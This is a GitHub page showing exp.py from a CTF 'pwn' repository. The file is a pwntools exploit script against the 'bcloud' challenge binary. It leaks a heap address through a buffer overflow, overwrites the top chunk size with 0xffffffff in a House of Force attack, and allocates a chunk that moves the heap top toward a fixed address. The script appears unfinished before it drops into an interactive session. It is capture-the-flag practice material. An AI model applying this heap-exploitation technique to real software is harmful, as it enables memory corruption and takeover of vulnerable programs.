forked from bash-c/pwn_repo
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexp.py
69 lines (56 loc) · 1.65 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
from time import sleep
import os
import sys
elfPath = "./bcloud"
libcPath = ""
remoteAddr = "localhost"
remotePort = 9999
context.binary = elfPath
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
elf = context.binary
if sys.argv[1] == "l":
context.log_level = "debug"
io = process(elfPath)
libc = elf.libc
else:
context.log_level = "info"
if sys.argv[1] == "d":
io = remote("localhost", 9999)
else:
io = remote(remoteAddr, remotePort)
if libcPath:
libc = ELF(libcPath)
success = lambda name, value: log.success("{} -> {:#x}".format(name, value))
def DEBUG(bps = [], pie = False):
if pie:
base = int(os.popen("pmap {}| awk '{{print $1}}'".format(pidof(io)[0])).readlines()[1], 16)
cmd = ''.join(['b *{:#x}\n'.format(b + base) for b in bps])
else:
cmd = ''.join(['b *{:#x}\n'.format(b) for b in bps])
if bps != []:
cmd += "c"
raw_input("DEBUG: ")
gdb.attach(io, cmd)
def newNote(length, cont):
io.sendlineafter(">>\n", "1")
io.sendlineafter(":\n", str(length))
io.sendafter(":\n", cont)
if __name__ == "__main__":
# DEBUG([0x8048A19])
io.sendafter(":\n", 'a' * 0x40)
io.recvuntil('a' * 0x40)
heapBase = u32(io.recv(4)) - 0x8
success("heapBase", heapBase)
io.sendafter(":\n", 'b' * 0x40)
io.sendafter(":\n", p32(0xffffffff) + 'c' * (0x40 - 4))
DEBUG([0x8048A19])
topChunk = heapBase + 0xd8
success("topChunk", topChunk)
newNote(topChunk - 0x804b120 - 8, 'dddd\n')
newNote(0x10, 'eeee\n')
io.interactive()
io.close()